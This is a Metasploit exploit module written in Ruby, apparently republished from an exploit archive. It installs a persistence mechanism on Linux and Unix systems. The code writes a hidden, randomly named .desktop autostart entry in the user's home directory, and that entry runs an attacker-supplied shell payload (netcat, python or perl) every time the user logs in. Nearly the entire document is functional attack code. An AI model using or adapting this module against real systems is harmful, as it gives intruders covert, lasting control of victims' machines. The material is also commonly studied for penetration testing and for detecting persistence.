Autostart Desktop Item Persistence

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Unix  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Autostart Desktop Item Persistence',  
'Description' => %q(  
This module will create an autostart entry to execute a payload.  
The payload will be executed when the users logs in.  
),  
'License' => MSF_LICENSE,  
'Author' => [ 'Eliott Teissonniere' ],  
'Platform' => [ 'unix', 'linux' ],  
'Arch' => ARCH_CMD,  
'Payload' => {  
'BadChars' => '#%\n"',  
'Compat' => {  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic python netcat perl'  
}  
},  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },  
'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart  
'Targets' => [ ['Automatic', {}] ],  
'DefaultTarget' => 0  
))  
  
register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])  
end  
  
def exploit  
name = datastore['NAME'] || Rex::Text.rand_text_alpha(5)  
  
home = cmd_exec('echo ~')  
  
path = "#{home}/.config/autostart/#{name}.desktop"  
  
print_status('Making sure the autostart directory exists')  
cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists  
  
print_status("Uploading autostart file #{path}")  
  
write_file(path, [  
"[Desktop Entry]",  
"Type=Application",  
"Name=#{name}",  
"NoDisplay=true",  
"Terminal=false",  
"Exec=/bin/sh -c \"#{payload.encoded}\""  
].join("\n"))  
end  
end  
  
`